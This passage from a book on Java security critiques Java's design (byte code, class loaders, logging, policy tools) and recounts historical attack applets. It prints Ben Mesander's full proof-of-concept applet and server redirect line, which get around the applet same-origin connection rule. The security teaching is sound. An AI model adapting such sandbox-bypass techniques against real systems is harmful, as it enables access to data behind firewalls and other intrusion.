The next programming language critique is more abstract: Java's byte code specification is not optimal. As an intermediate representation between the Java source and the machine code of the platform on which Java runs, byte code plays an important role. We believe there are better ways to represent the same sort of platform-independent code. One construct, called Abstract Syntax Trees (AST), would be easier to type check than existing Java byte code. ASTs would greatly simplify global dataflow analysis, which would speed up the Verifier and reduce the odds of a Verifier bug. That's because the current Verifier must painstakingly deduce information that ASTs have built directly into them. ASTs also have the same semantics as the source languages they represent. That means there is no need to question whether the intermediate representation is more powerful than the source language. By contrast, Java byte code semantics are different from Java source code semantics. Who can guarantee that Java byte code is constrained in similar ways to the Java language itself? If you're at a loss imagining why that matters, consider that some aspects of Java security depend on Java's semantics and not on byte code semantics. Does that mean it may be possible to do things directly in byte code that a Java compiler would, for security reasons (or other good reasons), not allow? Unfortunately, the answer is yes. For details on this issue, see page 196. In any event, since ASTs have a compilation speed (source to AST) comparable to byte code compilation speed (source to byte code), why not use ASTs? These and other language issues are discussed in greater detail in the Secure Internet Programming team's early paper, "Java Security: From HotJava to Netscape and Beyond" [Dean et al., 1996]. If you are interested in learning more about such things, the article is available on the Web at www.cs.princeton.edu/sip/pub/secure96.html.
Dynamic Class Loading Class loading has always been a problematic issue for Java. In fact, even though class loading has been redesigned and supposedly fixed in every successive JDK, each implementation has included at least one serious security flaw. A recent Java security hole, discovered in a beta version of Java 2 in 1998, was yet another problem with class loading (see Chapter 5 for details). In Chapter 2, "The Base Java Security Model: The Original Applet Sandbox," where class loaders are introduced and discussed in some detail, we point out that there are really two functions performed by class loaders:
1. locating and fetching byte code
2. managing namespaces.
There is no reason these two capabilities need to be combined into a single class. In fact, some of Java's more serious security holes could have been avoided if class-loading architecture had initially separated the two functions. The culprit in many security problems has been in defining the namespaces seen by
different classes and how the namespaces relate to each other. As the approach to class loading has changed throughout Java's short life, class loading has mutated from a completely extensible architecture (which was dangerous from a security perspective), to a system in which only trusted code could create a Class Loader, and back to a system in which untrusted code might once again be able to safely create a Class Loader (that is, if it follows a stringent set of rules). If you decide to create a Class Loader of your own, it is best to change only those aspects of class loading related to locating and fetching byte code. Avoid changing the namespace structure if at all possible. For more on the complications of class loading and how to fix them, see Drew Dean's doctoral thesis [Dean, 1998]. As we said before, class loading is a perfect example with which to counter claims that Java's security problems are all related to superficial implementation bugs.
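For illustration, here is a hedged sketch of a Class Loader that customizes only the locating and fetching of byte code (from a hypothetical local repository) and leaves the namespace and delegation machinery of java.lang.ClassLoader alone; it relies on the Java 2 findClass() hook.

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;

public class FetchOnlyClassLoader extends ClassLoader {
    private final File repository;   // hypothetical local directory of .class files

    public FetchOnlyClassLoader(File repository) {
        this.repository = repository;
    }

    // Override only findClass; loadClass keeps its standard delegation behavior.
    protected Class findClass(String name) throws ClassNotFoundException {
        File classFile = new File(repository, name.replace('.', File.separatorChar) + ".class");
        try {
            byte[] bytes = readAll(new FileInputStream(classFile));
            return defineClass(name, bytes, 0, bytes.length);
        } catch (IOException e) {
            throw new ClassNotFoundException(name);
        }
    }

    private static byte[] readAll(InputStream in) throws IOException {
        try {
            ByteArrayOutputStream out = new ByteArrayOutputStream();
            byte[] buffer = new byte[4096];
            int n;
            while ((n = in.read(buffer)) != -1) {
                out.write(buffer, 0, n);
            }
            return out.toByteArray();
        } finally {
            in.close();
        }
    }
}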
Can Java Be Proven Correct? Our previous discussion of ASTs and the current byte code representation leads directly to the next topic: formal verification. That's because any questions of provability are compounded by having two languages with separate semantics to understand (Java source code and Java byte code). Formal verification involves proving, in much the same way that a theorem is proven in mathematics, that a program does what it is supposed to do or that a programming language has certain properties such as type safety. This is a laborious process, to say the least. There are many sorts of formal analysis Java could undergo. The security model itself (if formalized) could be analyzed. The Java source language could be formalized in a specification, then shown to be valid. The same thing could be done for Java byte code. In addition, a better-specified formal relationship between Java byte code and Java source code could be worked out. The Java VM could also be formally verified. Computational Logic, Inc. (CLI), Schlumberger, and JavaSoft collaborated in 1997 to create a formal model of a portion of the JVM. The model was built in Common LISP and provided some formal analysis capabilities. The model performs extensive runtime type-safety checks, something that the standard VM does not do (the standard VM relies on the Verifier to perform many type-safety checks instead). CLI focused on Card Java (see Chapter 8, "Java Card Security: How Smart Cards and Java Mix"). It appears that CLI is not planning further formal analysis work. For more information see: www.cli.com/software/djvm/index.html.
Formalizing the Security Model To this day, Java still has no formal security model. The complete security policy has never been specified at a sufficiently high level for current versions of the language. As a group of security researchers once said, "A program that has not been specified cannot be incorrect; it can only be surprising" [Young, et al.,
1995]. It is not possible to determine just what secure means without creating a formalized policy. Furthermore, a particular implementation of a nonexistent policy cannot be properly verified. Some progress was made toward this goal in a report commissioned by Sun back in 1996. The report, entitled Security Reference Model for JDK 1.0.2, explained (in informal English) Java's implicit security policy (at least for the base security sandbox described in Chapter 2) [Erdos, et al., 1996]. The SRM is available through www.javasoft.com/security/SRM.html. Creating the SRM was a useful exercise; unfortunately, any utility provided by the SRM was caught in the Internet-time cross fire. The SRM is completely out of date. Given the rigorous security demands of electronic commerce, documents like the SRM should be demanded by organizations using consumerware in their security-critical systems. Progress on the formalization front has also been made by programming language researchers (see, for example, [Drossopoulou and Eisenbach, 1998; Stata and Abadi, 1998]). Work on the soundness of Java continues.
Analyzing Java Source The Java source language is powerful and includes a whole host of features. Only recently has any sort of specification of the language appeared. Given a complete specification of Java source semantics, a formal analysis can be completed. This work is currently under way.
Analyzing Byte Code Java byte code plays a critical role in the way Java works. Some progress has been made with regard to formalizing byte code semantics with the release of a specification for the VM [Sun Microsystems, 1996b] (also see [Venners, 1998]). Given a sufficiently detailed specification, it is possible to begin work on proving that the VM and Verifier systems are implemented properly. Preliminary work on testing Verifier implementations has been done by the Kimera Project at the University of Washington (for more on the Kimera effort, see Verifying the Verifier in Chapter 5).
Comparing Byte Code and Java Source Showing how Java byte code behaves in relation to Java source code was impossible without a semantics for both. Now that we have two specifications, we can determine whether or not byte code is more powerful than Java source code. Are there things that you can do with byte code that you can't do through Java source? Unfortunately, the answer is yes. The Princeton team has discovered at least one instance in which it is possible to create byte code for an activity that is not allowed when going through a Java compiler. Other efforts to probe byte code functionality include the University of Washington's Kimera Project and Mark LaDue's malicious applets. Byte code banditry is as potent an approach today as it was in 1996.
Analyzing the Java VM
One problem affecting formal analysis of Java implementations is the size of the Java system. With tens of thousands of lines of code, Java raises critical assurance flags. Making certain that each of these lines of code does not introduce subtle vulnerabilities requires significant security analysis. Only a bit of this sort of analysis has been performed. It is beyond today's technical capability to formally verify any piece of code in excess of a few thousand lines. This means that because of its size, Java is not amenable to formal proof of correctness. However, it may well be worth the effort to formally prove some aspects of Java's specification correct. The first targets should probably be the core of the VM and other security-critical pieces of the JDK, such as Class Loaders and Security Managers.
Software Engineering Many bugs have been found in various sections of the Java code. It is unlikely that security-critical code is bug free. Security vulnerabilities are often the result of buggy software. It is difficult enough to deal with bugs in standard code; bugs in security-critical code are much more serious. This problem requires sound software engineering. The fact that Java programs will be built out of prefabricated components makes any security bug much more serious. Many different sites may end up using a component that turns out to have a security problem. Not only will people liberally borrow security-impaired code snippets from each other, they will also begin to reuse entire classes of flawed code. Such code flaws will be increasingly difficult to isolate. Perhaps software engineering will develop a new approach that avoids such potential pitfalls. In any case, Java will continue to have an effect on what the future deems state of the art.
To Log or Not to Log The next concern involves something very simple: keeping track of what Java does on your machine. One universal capability that computer security experts rely on, no matter what the platform involved, is logging. Often, the only way to reconstruct an intrusion is to carefully and painstakingly read the associated log files. Of course, such detective work is not possible in an environment lacking log files. Logs provide several benefits:
● They allow the victim to determine what damage was done.
● They provide clues about how to prevent similar attacks.
● They provide raw data for many intrusion detection approaches.
● They provide evidence for possible legal or administrative proceedings against the perpetrator.
Java still has no logging capability (although as we shall see later in this chapter, a number of add-on products provide this). It is impossible to track which applets were loaded and run, as well as what those applets might have done. The most fundamental things that should be logged are file system and network access. Simply capturing these data would give system and security managers a chance to see what sorts of access were involved in an intrusion. File system access logging alone would help system managers protect files that Java crackers were accessing in their break-in attempts. It would also be good to capture applet byte code for analysis in case an applet ends up doing something hostile. It is often easier to recover from an intrusion if you know what caused it and what happened during the event. Chapter 4 examines how an applet can delay its processing until a later time. Given that applets can do this, logging becomes even more important. An especially crafty hostile applet can wait until some other Web site becomes the main suspect before doing its dirty work. It won't be surprising if the most hostile applets turn out to be the craftiest. Tracking byte code would give system managers the ability to at least verify the function of each applet that may have been involved in an attack. One of the lessons emphasized in the book Takedown is that without a log file, it is impossible to prosecute computer criminals [Shimomura and Markoff, 1996]. Without a log file, you have little legal recourse in the event of a system break-in. If your site is hit by an attack applet today, erasing critical information, you can't do anything about it, even if you know the culprit. Applet logging is an essential security feature that should be made available immediately.
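As a rough illustration of the kind of add-on logging we have in mind, the sketch below subclasses SecurityManager (Java 2 style) to record file and network access before delegating to the normal checks. This is a minimal sketch of our own, not a product; in a browser the vendor's own SecurityManager is already installed, so the code only shows the mechanism, and the class and log-file names are invented.

import java.io.FileWriter;
import java.io.IOException;
import java.io.PrintWriter;

// Hypothetical add-on: a SecurityManager that records file and network
// access so that an intrusion can be reconstructed from a log later.
public class LoggingSecurityManager extends SecurityManager {
    private final PrintWriter log;

    public LoggingSecurityManager(String logFile) throws IOException {
        log = new PrintWriter(new FileWriter(logFile, true), true);
    }

    public void checkRead(String file) {
        log.println("READ    " + file);
        super.checkRead(file);      // the usual Java 2 permission check still runs
    }

    public void checkWrite(String file) {
        log.println("WRITE   " + file);
        super.checkWrite(file);
    }

    public void checkConnect(String host, int port) {
        log.println("CONNECT " + host + ":" + port);
        super.checkConnect(host, port);
    }
}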
Who Do You Trust? Early versions of Java were built without technological help for making privilege decisions. Since 1996, things have changed significantly; so much so that this book required a complete revision. Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," discusses the impact of the new privilege system defined by Java 2 on the Java security situation. Not only is the VM itself infused with the capability to create and enforce privilege policies, but the very primitives out of which the new system is constructed have been made available to Java developers. Java now includes support for standard cryptographic algorithms, including SHA, MD5, DES (at least in North America), and SSL. What is needed now are tools for creating and managing security policies that include privilege decisions. Java 2 offers fine-grained access control, but it does not offer a compelling tool for creating, testing, and managing policy (see Appendix C, "How to Sign Java Code"). Lack of such management tools is likely to slow the adoption of Java 2 functionality in the enterprise.
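Those primitives are visible directly in application code. As a hedged illustration (not an example from the reference implementation), the sketch below shows the JDK 1.2 doPrivileged() idiom mentioned again in the next subsection; the class name and the property being read are our own invention.

import java.security.AccessController;
import java.security.PrivilegedAction;

public class PrivilegedExample {
    // Trusted library code asserts its own privilege for one small action,
    // so that less-trusted callers further up the stack do not need the
    // corresponding permission themselves.
    public static String readVendorProperty() {
        return (String) AccessController.doPrivileged(new PrivilegedAction() {
            public Object run() {
                return System.getProperty("java.vendor");
            }
        });
    }
}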
Scattershot Security One of the most common criticisms of early Java security architecture centered on how Java spreads security functionality throughout the code. Unfortunately, the problem of scattershot security has not gone away. Research at Princeton shows that security boundaries (between trusted system code and less-trusted code) are crossed up to 30,000 times per second in a typical applet [Wallach, et al., 1997]. Other evidence can be seen in the effort that Sun undertook when changing the JDK 1.2 API from the beginPrivileged()/endPrivileged() syntax of beta3 to the doPrivileged() syntax of beta4. Over 250 changes were required in the Sun reference VM implementation to make the change. Reliance on a scattershot architecture means that security depends on many different parts working together properly. There is no centralized security system; no single source for security approval. Java implements security features through dynamic type checking, byte code verification, class-loading restrictions, and runtime checks performed by the Access Controller. Each resides in a different part of the Java environment. Such an architecture depends on too many unrelated functions. If all of the security-critical functions were collected together in one place, that aggregate code could be more easily verified and analyzed. That simple step would satisfy some concerns held by security experts. Some of Java's security policies are dependent on the Java language itself. This is fine if all Java byte code must be created by a Java compiler, but what guarantees does anyone have that byte code has been generated by a Java compiler that plays by the rules? There are none, nor should there ever be. There are compilers now in existence that turn Ada and C code into Java byte code. To take such third-party bytecode development efforts away by legislating a particular compiler would go against the spirit of the language. The problem is that the Virtual Machine interpreting Java byte code may allow more functionality than it should. More explicitly, there may be more functionality built into the byte code than security would dictate (see Figure 6.1). If the Java compiler never creates byte code capable of exploiting such features of the VM, then the architecture would seem to remain safe. Since no one has control over who and what creates Java byte code, system managers should not rely on such a false hope. Someone could write a compiler able to create byte code that seems valid to the VM but breaks rules ordinarily enforced by the Java compiler. Or, someone could create byte code through any number of other means; for example, direct creation with an editor, or creation with a Java byte code assembler (like Jasmin, see www.isbe.ch/~wwwinfo/sc/cb/tex/jasmin/guide.html).
Figure 6.1 If Java byte code is more powerful than Java source code, then the extra functionality in byte code is dangerous. There is some evidence that this is the case.
One somewhat inefficient (but interesting) solution to this problem has been suggested by Andrew Appel of Princeton. He suggests checking byte code by first decompiling it to Java source, then recompiling the source to byte code. If a compiler you trust does not complain during recompilation, then the original byte code is equivalent to some Java source program, and hence must obey the rules of the Java language. This process is slow, but in certain security-critical instances it pays to be paranoid.
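A hedged sketch of how such a check might be scripted from Java appears below. The "decompile" command is invented (a stand-in for whatever decompiler you trust), and the sketch ignores details like temporary files and classpaths.

// Hypothetical sketch of the decompile-then-recompile check suggested above.
public class RecompileCheck {
    public static boolean looksLikeRealJava(String classFile) throws Exception {
        Process decompile = Runtime.getRuntime().exec(
            new String[] { "decompile", classFile, "-o", "Recovered.java" });
        if (decompile.waitFor() != 0) {
            return false;                // could not even recover source
        }
        Process recompile = Runtime.getRuntime().exec(
            new String[] { "javac", "Recovered.java" });
        return recompile.waitFor() == 0; // trusted compiler accepted the source
    }
}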
Decompiling Java Byte Code Although decompilation is not a traditional concern of security experts, it does have some interesting twists in Java. It turns out that one of the side effects of Java byte code's clarity is that byte code is very easy to decompile. This means that given a .class file, it is possible to automatically reconstruct reasonable source code. (Of course, it is also possible to decompile x86 object code as well as any other executable code. Java is not alone in its exposure to decompilation.) The JDK comes with a weak decompiler as one of its standard tools, but much better decompilers are available on the Web. In the early days, the best was the Mocha decompiler, which has since become obsolete. A good decompiler to consider now is the SourceAgain Decompiler from Ahpah software. Decompilation is relevant to security for a couple of reasons. The first reason is that businesses interested in using Java as a development language will need to consider the existence of decompilers before they distribute Java .class files. It probably won't be possible to sell something if making knock-offs turns out to be incredibly easy. Fortunately, some companies now distribute Java source code obfuscators (watch out for snake oil solutions in this domain, however). The end result of obfuscation is that although a .class file will decompile into valid Java, that valid Java won't be very readable by humans. One caveat: Obfuscation certainly makes decompilation more difficult, but it won't protect your code against a determined adversary.
Even if your code is subject to decompilation, you can still get some protection by copyrighting the code and legally defending the copyright in court if necessary. This is not an ideal solution, but it's better than nothing. A closely related issue involves protecting secret or otherwise sensitive information in a piece of mobile code, such as cryptographic keys. A good guideline if you are developing mobile code in Java is not to include any secrets in the code. An applet that carries a password or a crypto key in its code is amenable to hacking. Anyone who runs such code can get access to its secrets. More on this issue can be found in Chapter 7, "Java Security Guidelines: Developing and Using Java More Securely." There is a third security concern related to decompilation. Given a piece of Java source code obtained by decompilation, a cracker can better analyze the program for weaknesses that could be exploited to break it. This would allow an attacker to attack a Java program more intelligently. Applications like Netscape's Java VM are susceptible to this sort of source-related attack. Crackers like to have code to poke around with. Furthermore, an attacker could build a very realistic Trojan Horse program that looks almost exactly like the original. Like its ancient counterpart, a modern Trojan Horse is a program that appears to be one thing at one level, but turns out to breach security at another.
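To make the earlier guideline about embedded secrets concrete, here is a purely hypothetical anti-pattern (the class name and password are invented): any constant like this survives compilation and is handed straight back by a decompiler.

import java.applet.Applet;

public class LeakyApplet extends Applet {
    // Hypothetical anti-pattern: a "secret" compiled into the applet.
    // It is stored as a plain string constant in the .class file, so any
    // decompiler (or even a hex dump) will reveal it to an attacker.
    private static final String SERVER_PASSWORD = "s3cret";

    public void init() {
        // ... authenticate to a back-end service using SERVER_PASSWORD ...
    }
}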
Trusted Dialogs and Meters In an earlier chapter, we raised the idea of providing trusted dialog boxes for critical actions like file I/O, or critical measurements such as CPU cycles used. These dialogs would provide an important monitoring and feedback mechanism to Java users. Providing a trusted set of dialogs (that cannot be spoofed) for things like file access seems like a good idea. However, with any such user interface, one of the key goals must be to minimize user involvement in security. Most users don't read their dialog boxes before they click OK (recall the dancing pigs problem). Sophisticated users should probably have some control over their security policies, but the less intrusive this control is, the better. Management issues like these are taking on more importance as Java security evolves from the base sandbox into the Java 2 model in which security policy plays such a central role. Centralized management is especially appealing at the enterprise level, and much work remains to be done to develop policy management tools and techniques. Far from being in the way, a set of resource access indicators that cannot be forged would be a welcome addition to Java from nearly every user's perspective. This set of instruments could allow a user to track system resources such as CPU cycles, or microphone use. Some third-party vendors offer monitoring capabilities like the ones mentioned here. What is not yet clear is how well protected against spoofing these meters are. A meter that can be made to display false system information on behalf of an attack applet is potentially more dangerous than having no meter at all.
Management Tools Java 2 is not going to be adopted overnight; it is a complicated system, and utilizing it to its full potential will be a complicated undertaking. As we have said before, we think it is likely that signed mobile code and complex security policy will first be adopted for the intranet. Only after organizations and enterprises have their ducks in a row internally will they begin to experiment with complex security policies that make use of the Internet/Web. A set of tools for creating and managing policy, especially enterprise-wide, would go a long way toward easing the adoption of Java 2. The existing tools being distributed with the JDK are rudimentary at best, and hard problems like identity/certificate management have many remaining open issues. (See Appendix C for details on how to use some of the existing code signing tools.) The problem of policy management has existed for years in the security community. One characteristic of the problem is that it does not scale well. A tool that may be adequate for managing policy for one browser will probably not work well across a network of hundreds or thousands of machines. This problem crops up in all aspects of security. One common way to get a handle on it is to create a choke point at the perimeter (for example, at the firewall) and instantiate site-wide policy there. Security vendors have been frantically working on policy-management tools for some time, but work remains to be done. Ideally, a site-wide policy could be managed by a powerful tool and would include mobile code policy. Many security pundits anticipated that by now, a solid public key infrastructure (PKI) would have been put in place; unfortunately, that is not the case. Java 2 would be much easier to adopt if the PKI were already there. As it now stands, delays in PKI deployment are likely to hamper systems that rely heavily on code signing. After all, if you have no idea who is behind an identity, how can you possibly trust them? It is not clear at this point why any particular certificate authority deserves your trust.
Java Antidotes As can be seen from the laundry list of high-level concerns, Java security can still be improved in many ways. Some of the most effective antidotes to Java security problems involve addressing the criticisms raised here.
Securing Java: Improvements, Solutions, and Snake Oil
Now that we've covered hostile applets, let's turn to the positive side and talk about what can be done to improve Java's security. Of course, security can always be improved by fixing specific bugs, as Sun Microsystems, Netscape, and Microsoft have been doing. Again, removing a needle from a haystack is easy once you've been stuck by it. This chapter focuses on more global issues surrounding the design of Java. What sorts of high-level antidotes are there to some of Java's security concerns? This chapter has two major goals. The first goal is to discuss high-level concerns about Java and to make some suggestions about how they could be addressed. Many of these suggestions carry over from the original edition of this book. Since 1996, only a handful of our original suggestions have been adopted. At the risk of being redundant, we raise them again. The high-level concerns include programming language issues, formal analysis, applet logging, trust models, the distributed nature of the security model, implementation versus specification, decompilation, trusted dialogs, and policy management. Fixing the way that Java does some of these things will certainly improve security. The second goal is to discuss a number of Java security add-on products that have appeared on the market. A number of companies have introduced add-on products that are meant to improve Java security by mitigating known risks. Vendors include Finjan, Digitivity (now Citrix), Security7, and others. We take a quick look at each of these products and consider their goals in light of objective reality.
Chapter Six Sections
1. Improving the Platform
2. Writing Safer Code: A Defensive Stance
3. Third-Party Solutions or Snake Oil?
4. Risks That Third-Party Vendors Can Address
5. Risks That Third-Party Vendors Can't Address
6. Assess Your Risks
Attack Applets: Exploiting Holes in the Security Model
Section 20 -- What These Problems Teach Us The designers of Java tried to ensure that applets could not misbehave. Although they often claim success, claims about Java's security have been greatly exaggerated (with apologies to Mr. Clemens). Lately, the security message emanating from the major vendors has tended to emphasize the idea of managing risks. That's good. We live with risks every day, and there is no reason we can't live with mobile code risks, especially if we take on the risks with our eyes open and some forethought about possible consequences. All implementations of Java have had some rather serious security flaws. Even "mature" implementations, including Java 2, are not perfect. All known attacks have been detailed in this chapter. So the question is what to do as we face these risks. Turning Java off is certainly one solution, but not a very satisfying one. Java has lots to offer, and not using it would probably be a poor decision in the long run. The new Java 2 security model, with its emphasis on policy, may help make Java risks easier to manage. The trick is setting up a sound policy that makes sense for your organization. Each of the security problems that we discussed in this chapter can be implemented as an attack applet. In fact, the Princeton team regularly creates attack applets in the lab to test the limits of Java's vulnerabilities.4 Although rumor has it that attack applets based on the DNS bug and the Princeton Class Loader attack have appeared on underground Web sites, there is no convincing evidence that such attack applets have ever been used to crack a system on the Net. Nonetheless, the main reason attack applets need to be taken very seriously is that the end result of a successful attack is full system penetration; in other words, attack applets are capable of aiding a cracker in taking over your machine. Once you no longer "own" your machine, a cracker can install a virus, erase your hard disk, place Trojan Horses and logic bombs, or maybe just spy on you and steal your credit card information, bank account number, business plans, or personal correspondence. Java brings the formidable power of mobile code to the Web. Trading security for this power is a tough pill to swallow, but a pill that's probably worth ingesting. Users want audio/visual conferencing without
cross-network eavesdropping. Users want loosely coupled computation for things like factoring without cycle theft and denial of service. Users want games without Trojan Horses. Users want save and restore for applet-based preferences without having their valuable files stolen. Being security conscious, users can probably have what they want, without getting anything that they don't need.
Attack Applets: Exploiting Holes in the Security Model
Section 19 -- Beat the System In July 1998, Dirk Balfanz, Drew Dean, Edward Felten, and Dan Wallach of Princeton's Secure Internet Programming team found another Java security flaw that allows a malicious applet to disable all security controls in Netscape Navigator 4.0x. After disabling the security controls, the applet can do whatever it likes on the victim's machine, including arbitrarily reading, modifying, or deleting files. As usual, the Princeton team implemented a demonstration applet that deletes a file. The hole that the Princeton team discovered was actually present in all VMs, but was only exploitable in Netscape 4.0x. This serves to emphasize the difference between holes and exploits discussed earlier in the chapter (see page 142). Figure 5.7 illustrates the relationship between a security hole and an attack applet that exploits the hole.
Figure 5.7 Security holes and exploits. An attack applet is created to exploit one or more security holes in order to completely compromise security.
This attack pieced together several security-related flaws. The first flaw, discovered by Mark LaDue, is that the Netscape 4.0x Security Manager does not prevent untrusted applets from creating subclasses of
Netscape's AppletClassLoader class. This allows an applet to create a Class Loader. The second flaw, discovered by the Princeton team, is that the class loader mechanism, as of JDK 1.2beta3 and Netscape 4.0x (and, apparently, Internet Explorer 4.01), sometimes allows a malicious Class Loader to override the definitions of built-in classes. Specifically, a Class Loader can use its defineClass() method to define classes that have the same name as any built-in class, provided that the built-in class being overridden has not yet been loaded into the Class Loader's namespace. Since the correct operation of the Java VM depends in part on the correct behavior of built-in classes like java.lang.Class, java.lang.Object, and java.lang.Exception, a Class Loader that can override the definitions of built-in classes can change the rules of the Java VM. The third flaw is a subtle bug in the Verifier that opens a window of vulnerability for the class-overriding trick. The details of this third flaw are a bit too sensitive to publish here. Suffice it to say that the Verifier assumes that only certain types of objects can appear on the stack in some special situations, and that class-overriding allows an attacker to violate this assumption. The combination of these three flaws allows an attacker to create type confusion, which leads to a full-blown security breach as usual.
Class Loading Take Four One instructive thing about this attack is the role of class loaders. Several previous attacks have exploited class loader problems, and this attack shows that the class loader design was still not right, even after several iterations. Indeed, the problem of designing a correct class loader API is a subject of research by Drew Dean at Princeton [Dean 1997], leading to a major portion of Dean's Ph.D. thesis. The problems with class loaders are perhaps the best counter-argument to those who say that Java's security problems have been superficial implementation bugs. Fixing these problems is hard enough to merit a Ph.D. thesis! This flaw is fixed in Netscape Navigator 4.5.
Attack Applets: Exploiting Holes in the Security Model
Section 18 -- Look Over There In August of 1997, Ben Mesander, a professional programmer and consultant from Creative Concepts in Boulder, Colorado, uncovered a security hole that allowed untrusted Java applets to make network connections to arbitrary locations. This flaw affected browsers with VMs coded to the JDK 1.0.2 specification. According to the JDK 1.0.2 security model, applets are not allowed to make network connections to any host other than the Web server from which they come. Three browsers (HotJava, Netscape, and MSIE) were all susceptible to the problem (at least with some proxy configurations, as we explain later). To demonstrate the flaw, which was most apparent in the MSIE implementation of Java, Mesander wrote a simple applet that was able to load a graphic from www.microsoft.com even though the applet was not hosted from that server. The ability to open arbitrary connections to other servers is distressing for several reasons. The first is that such a connection provides a channel for indirect attacks. That is, a bad guy can cause your browser to run an attack against another server, making your machine take the blame. Another is that information from your machine may be siphoned off to another site. A third is that some attack code could be fetched from another location, leaving the true culprit applet in a less-suspicious situation should a successful attack be carried out against your machine. Finally, and most realistically in terms of the example we will show later, the attack applet is able to download an image from any Web server, even those servers behind firewalls. If you have images on your intranet that should not be seen by people outside your organization (such as sales data with sensitive pricing information), the seriousness of the attack is apparent. In any case, it is clear that Mesander's applet was able to do something that should not be allowed. The applet itself is shown as Listing 5.1. Mesander serves up this "test applet" as an example on his Demo of Browser Security Hole page at neurosis.hungry.com/~ben/. The applet attempts to load a graphic from a disallowed site (Microsoft's Web site). The applet is able to determine its level of success and display a message relating to the security of your browser.
Listing 5.1 Ben Mesander's applet WhereDoYouWantToGoToday fetches an image from a disallowed location.

// [email protected]

import java.applet.*;
import java.awt.*;
import java.net.*;

class WhereDoYouWantToGoToday extends Canvas {
    Image image = null;

    WhereDoYouWantToGoToday (Image image) {
        super ();
        this.image = image;
    }

    public void paint (Graphics g) {
        g.drawImage (image, 0, 0, this);
    }

    public Dimension preferredSize () {
        return new Dimension (image.getWidth (this), image.getHeight (this));
    }

    public Dimension minimumSize () {
        return preferredSize ();
    }
}

public class example0 extends Applet {
    private Button b;

    public void init () {
        createUI ();
    }

    private void createUI () {
        setLayout (new BorderLayout ());
        b = new Button ("Go!");
        add ("West", b);
    }

    public boolean action (Event evt, Object arg) {
        if (evt.target.equals (b)) {
            try {
                Image i = getImage (new URL (getDocumentBase (),
                    "cgi-bin/redirect?where=" +
                    URLencode ("www.microsoft.com/library/images/gifs/homepage/tagline.gif")));
                MediaTracker tracker = new MediaTracker (this);
                tracker.addImage (i, 0);
                tracker.waitForID (0);
                if (i.getWidth (this) == -1)
                    add ("Center", new TextField ("Browser did not get exception, but image did not load"));
                else {
                    add ("Center", new WhereDoYouWantToGoToday (i));
                    add ("East", new TextField ("Your browser is not secure."));
                }
                validate ();
            } catch (Exception e) {
                add ("Center", new TextField ("Exception while fetching image:" + e));
                validate ();
            }
            return true;
        }
        return super.action (evt, arg);
    }

    private static String URLencode (String s) {
        int i;
        StringBuffer b = new StringBuffer ();
        for (i = 0; i < s.length (); ++i) {
            b.append (URLencode_helper ((char) (s.charAt (i) & 0xff)));
        }
        return b.toString ();
    }

    private static String URLencode_helper (char c) {
        if (c < 16) {
            return "%0" + Integer.toString (c, 16);
        } else if ((c < 32) || (c > 127) || (" +&=%/~#".indexOf (c) >= 0)) {
            return "%" + Integer.toString (c, 16);
        } else {
            return String.valueOf (c);
        }
    }
}
The applet works in concert with an HTTP redirect call that the browser being attacked follows to wherever it leads. Most of the dirty work takes place in the line:

Image i = getImage (new URL (getDocumentBase (), "cgi-bin/redirect?where=" + URLencode ("www.microsoft.com/library/images/gifs/homepage/tagline.gif")));

Having your Web server implement the redirect command is very simple. With the Microsoft IIS server, the code is as simple as:

Response.Redirect("http://" & Request.QueryString("where"))

This applet demonstrated flaws in the Java implementations of several browsers. In particular, results before the browsers were patched showed the following vulnerabilities:
● MSIE browsers on all versions of Windows had a serious bug, which Microsoft took very seriously and released a patch for within several days of the bug's discovery.
● Netscape browsers were susceptible only if they were set up to use an HTTP proxy server. In particular, proxies set up to work outside the firewall caused big problems. Netscape fixed the bug in later releases of their browser.
● The HotJava browser allowed classes to be loaded via redirects, but did not allow images to be loaded this way.
It is important to emphasize that this is a very clear example of an implementation bug and not a design problem. Java's design at the time was such that redirects were rendered impotent as an attack mechanism. However, none of the vendors (including Sun's HotJava team) properly implemented the design.
Another important point is that the attacker must know the URL of the image or class file that is being indirectly fetched. Sometimes, getting this information is not possible. Other times, standardized naming conventions constrain the space of possible names enough that a good guess works. A good attack strategy would be to combine this exploit with a standard social engineering attack that is used to determine the name of the image file or class file to steal.
Last, But Not Least Mesander's redirect exploit was the last Java-related problem discovered in JDK 1.0.2 and JDK 1.1. In fact, Java experienced a calm period of several months before the next serious hole was discovered in July of 1998. The timing of these flaws supports the observations that discovery of holes tends to be clustered around major releases and that eventually a majority of the holes are found and fixed.
Attack Applets: Exploiting Holes in the Security Model
Section 17 -- The Vacuum Bug In June of 1997, the Kimera Project team uncovered another security hole in JDK 1.1.2 and the HotJava browser. Like the previous 24 flaws discovered, the new security hole had at its core a type-safety flaw in the Verifier. Prompted into further action by Sun's response to the first announcement, the Kimera Project team decided to create a complete exploit based on the new flaw. That was one way to emphasize that type-safety problems should always be taken seriously! The flaw itself existed only in JDK 1.1.1 and JDK 1.1.2 and was never present in either of the major browsers. By itself, the flaw manifests as a VM/browser crash (the browser being HotJava). That is, an applet that passes the Verifier with flying colors would end up crashing the VM when it actually ran. The crash is caused when the applet directs the browser to access inaccessible memory. Using a PC debugger (MSDEV), Kimera team members were able to determine which instruction was causing the browser to crash. With this information in hand, it was possible to cause the browser to jump to a legitimate address and start reading arbitrary memory ranges. In a strings-like move, the malicious code directed an ASCII text version of the targeted memory range back to a collection server. The attack applet created by Kimera exploited the type-safety problem to carry out this attack. The most pernicious aspect of the attack was the applet's ability to determine sensitive information about the user from the browser's memory space, including configuration settings, private crypto keys, name, email address, browser history, cache contents, etc.
Why the Flaw Was Exploited
Other than its ability to steal sensitive data, the main purpose of the attack applet was to demonstrate that what Sun had called "less serious" type-safety problems could be easily turned into full-fledged attacks. Java has at its heart a language-based security model. Such models depend completely on the type system to provide security guarantees.
Attack Applets: Exploiting Holes in the Security Model
